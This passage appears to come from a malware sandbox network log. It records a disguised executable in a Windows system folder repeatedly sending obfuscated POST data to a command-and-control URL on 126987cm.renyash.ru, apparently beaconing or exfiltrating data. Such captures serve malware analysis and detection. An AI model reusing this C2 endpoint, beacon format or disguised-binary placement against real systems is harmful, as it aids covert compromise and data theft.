                                                                                                                                Jan 1, 2025 21:48:14.687953949 CET800INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:14 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CZMIH7Xrj2PmWBb45G6%2FlQ9qaIuYBaa1t4GvQnwc7O0WVlvTs2YCNrMZRrGPzdpAcaVFqhcl3xfW09Xmj9QDR6BZB6GVqsp5QQNLgp1FHv9hd6YJBWq9gnRZsF7DztJlIBBvgnRi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e79ed24c47a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3291&min_rtt=1631&rtt_var=3932&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=97888&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                66192.168.2.449936172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:14.812613010 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:15.175303936 CET1072OUTData Raw: 51 54 5b 55 53 40 59 57 5d 56 5b 57 54 58 51 5d 58 50 58 5d 5b 53 57 40 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QT[US@YW]V[WTXQ]XPX][SW@VYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["&2, 1!-?$_#+(*'4"8V'2Y=&>>1!^&%X*7
                                                                                                                                Jan 1, 2025 21:48:15.256421089 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:15.557360888 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:15 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ohfXtznWLwuXyCtxQZpQrwVOzYCdNV9Kq%2FwlqLR3dF4moCTqEy6svp7HIzgzBb%2BpzLGnr7toMfkVa9Z2K%2FMK939s1oR9vRkbcFdgrLcTcjbCw%2FPw5huOqTtG38S2fOCHEExRuMr9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e7f0ece421b-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3396&min_rtt=2058&rtt_var=3448&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=114393&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                67192.168.2.449943172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:15.694185019 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:16.046394110 CET1072OUTData Raw: 54 56 5b 55 53 43 59 5e 5d 56 5b 57 54 5f 51 5c 58 5c 58 5f 5b 51 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV[USCY^]V[WT_Q\X\X_[QWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!31#^7!Y >7['0Y!+B #6'02X*&9B?32!^&%X*+
                                                                                                                                Jan 1, 2025 21:48:16.158142090 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:16.328347921 CET812INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:16 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uqtNBr1QLnPQc6EfHN%2FMYh2SQqmMF7u6c%2FuAnUHtKRn7%2FBLTbu6VHVomEiuZLyJZs3Sx%2Fi88aMAD4zBWHuLCATsB%2B5hBqNEElElqKAgv97QBEZ%2FiWldoGP9%2BwxWALxh9TXlwyrxP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e84a8610c8a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4600&min_rtt=1594&rtt_var=6609&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=56937&cwnd=107&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                68192.168.2.449949172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:16.453356981 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:16.811736107 CET1072OUTData Raw: 54 51 5b 56 56 40 5c 55 5d 56 5b 57 54 58 51 5d 58 56 58 5c 5b 57 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ[VV@\U]V[WTXQ]XVX\[WWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'1049!>?3>;#;#+$+U!(W$"X(6"<':!^&%X*7
                                                                                                                                Jan 1, 2025 21:48:16.924693108 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:17.250823021 CET810INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:17 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z745oNPoF%2F8JDWLa%2FVhHdf%2BEn7%2FWpFUknljf6NviPxm2A%2FxnN4oEtHeNt4M33E2oUyvOUpy%2FvvkQxBgaqRoD9HXvhGj52hNlGfKkrUdqVEgve3cTIhItAVtP70h1ClYIaBGWxpyd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e897e8042b5-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4682&min_rtt=1603&rtt_var=6760&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=55642&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                69192.168.2.449955172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:17.379276991 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:17.739327908 CET1072OUTData Raw: 54 5f 5e 50 56 45 59 52 5d 56 5b 57 54 59 51 52 58 55 58 5d 5b 57 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_^PVEYR]V[WTYQRXUX][WWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["3"+_726<$/!8+*7+Q"5S00&)@*?-8[1!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:17.822901011 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:18.115868092 CET811INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:17 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k8iJFwiHTKUxmD1avVudrcg99PeBrfs2zn4aKH4UdBvHAaD8Ih5O0CG42ALZbSs%2BldlTcP3%2BTPRhet3HKuECYAo6rK%2FcHF%2BQVHT%2BHFe4ky7mD5iY4l4ciiQgfmkG%2FZGEyjz6dG9i"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e8f1b354262-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2621&min_rtt=1593&rtt_var=2654&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=148645&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                70192.168.2.449964172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:18.550086021 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:18.905550957 CET1072OUTData Raw: 51 55 5b 50 56 44 5c 52 5d 56 5b 57 54 55 51 53 58 5c 58 50 5b 55 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[PVD\R]V[WTUQSX\XP[UWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$#[#"5>4$="#(7'U"?$32*%9A?. ':!^&%X*
                                                                                                                                Jan 1, 2025 21:48:18.993268013 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:19.248621941 CET809INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:19 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=55970%2BX3%2BlDkw1PEtf26CokQafwQ9lWwZW4Mp4GeWFqNW3zhqMMdMx9vng%2FhQTJakblCT6WldUdwb0AzTqruhHeQy4QCe%2B7O0zASJqQzObMkjIsRtiEquxhAA%2F27s5zm5C9BrqHd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e966e5d42d4-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2208&min_rtt=1592&rtt_var=1830&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=223720&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                71192.168.2.449970172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:19.377564907 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                72192.168.2.449973172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:19.599226952 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1764
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:19.952332020 CET1764OUTData Raw: 54 55 5b 50 56 41 5c 54 5d 56 5b 57 54 5b 51 53 58 57 58 5c 5b 5f 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TU[PVA\T]V[WT[QSXWX\[_WCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["02'Y 2.!43,X6<<"<006]>@&+-+&:!^&%X*
                                                                                                                                Jan 1, 2025 21:48:20.071722031 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:20.264096975 CET966INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:20 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FhgoZjCogAd0SEG%2B92OW7i3GuOtLBlX%2BKnpPLxfmoKlW9hbKTDi6h7kNf59Do3tJT%2FUe0eAaHL%2F9WnVjZXyl%2F%2B4yLPImv%2BrC%2B7mwyI4HRVFoOrCVvPanoTfexCWNbgk71M82ItVp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e9d1b3d9e16-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3131&min_rtt=1861&rtt_var=3238&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2109&delivery_rate=121433&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 54 28 36 0d 54 34 22 21 56 28 2b 2b 5e 31 22 3a 59 26 0d 29 41 3c 3b 2f 5e 28 59 3b 0b 24 2c 30 5d 26 2a 22 0a 2b 32 02 10 2a 1c 20 5c 05 1b 39 5b 24 39 33 58 32 05 0b 10 2a 33 23 00 20 06 22 59 3e 0d 3b 09 20 3b 21 10 31 2b 39 56 24 14 2d 0d 3c 02 2b 1a 29 33 2c 0d 26 07 2a 51 0f 16 38 53 29 33 2d 03 2a 12 30 5a 27 31 38 5b 35 1b 2d 1e 31 2b 0d 53 27 29 2a 1f 28 10 2b 56 36 33 3f 52 25 2f 31 02 26 2e 3c 09 2e 2a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!T(6T4"!V(++^1":Y&)A<;/^(Y;$,0]&*"+2* \9[$93X2*3# "Y>; ;!1+9V$-<+)3,&*Q8S)3-*0Z'18[5-1+S')*(+V63?R%/1&.<.*&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                73192.168.2.449974172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:19.719274044 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:20.077482939 CET1072OUTData Raw: 54 57 5b 5f 53 47 5c 52 5d 56 5b 57 54 54 51 58 58 5c 58 5c 5b 53 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW[_SG\R]V[WTTQXX\X\[SWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0?""9"'\$4["7*$<6%8S'36Z*>?^'*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:20.171821117 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:20.343327045 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:20 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFQvClkhjgj81DxOAFeufRljF2owYgH7ePcGJJNq2K1erAW7g9zZCdhpqn6Wu%2FCPBJuGB6LREZrEsgEkB3bKbNvuf51b0vmTYax5rCjzgTGC6SZgc1z675ooqFO769TnrskSJw%2Bp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e9dcc014384-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3557&min_rtt=1615&rtt_var=4490&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=85106&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                74192.168.2.449980172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:20.474062920 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:20.861793995 CET1072OUTData Raw: 51 51 5b 5f 56 45 5c 53 5d 56 5b 57 54 5e 51 5e 58 56 58 5e 5b 54 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QQ[_VE\S]V[WT^Q^XVX^[TWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["0$""5;'=8Z"+$<$!&4W'=6*+. &!^&%X*/
                                                                                                                                Jan 1, 2025 21:48:20.939517021 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:21.203891993 CET810INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:21 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NVoPqicxyU%2FYfHmr6nF11x%2FTdV7WK6KTxvfumX%2Ffz1V1wTT2nEOq1lk8LWmK3OYE%2FRg4VQ1Y25VLHJcyWFQHpxr2wMGGoo2lME6If3Q%2FLuTNMZa1%2BscNAlvIo16as7dTgjgcl5zz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ea28e82425b-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3501&min_rtt=1559&rtt_var=4469&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=85400&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
